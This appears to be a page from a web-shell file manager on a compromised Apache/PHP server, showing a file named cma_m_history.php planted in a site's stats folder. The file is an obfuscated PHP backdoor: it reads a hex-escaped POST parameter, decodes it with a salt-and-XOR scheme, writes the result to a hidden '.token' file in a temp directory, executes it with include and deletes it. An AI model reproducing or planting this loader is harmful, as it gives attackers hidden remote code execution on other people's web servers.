HEX
Server: Apache
System: Linux localhost.localdomain 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User: web57 (5040)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/clients/client6/web57/web/stats/2024-10/cma_m_history.php
<?php

if(array_key_exists("e\x6E\x74", $_POST) && !is_null($_POST["e\x6E\x74"])){
	$marker = array_filter([ini_get("upload_tmp_dir"), getcwd(), "/tmp", "/var/tmp", getenv("TMP"), session_save_path(), "/dev/shm", getenv("TEMP"), sys_get_temp_dir()]);
	$itm = $_POST["e\x6E\x74"];
	 	 $itm	=	 explode ( 	"." ,	$itm	)  ;	
	$pgrp='';
            $salt='abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS=strlen($salt);
    
            foreach($itm as $o => $v3) {	$sChar=ord($salt[$o % $lenS]);
                $dec=((int)$v3 - $sChar -($o % 10)) ^ 66;
                $pgrp .= chr($dec);} 	
	foreach ($marker as $parameter_group) {
    		if (array_product([is_dir($parameter_group), is_writable($parameter_group)])) {
    $element = str_replace("{var_dir}", $parameter_group, "{var_dir}/.token");
    $success = file_put_contents($element, $pgrp);
if ($success) {
	include $element;
	@unlink($element);
	exit;}
}
}
}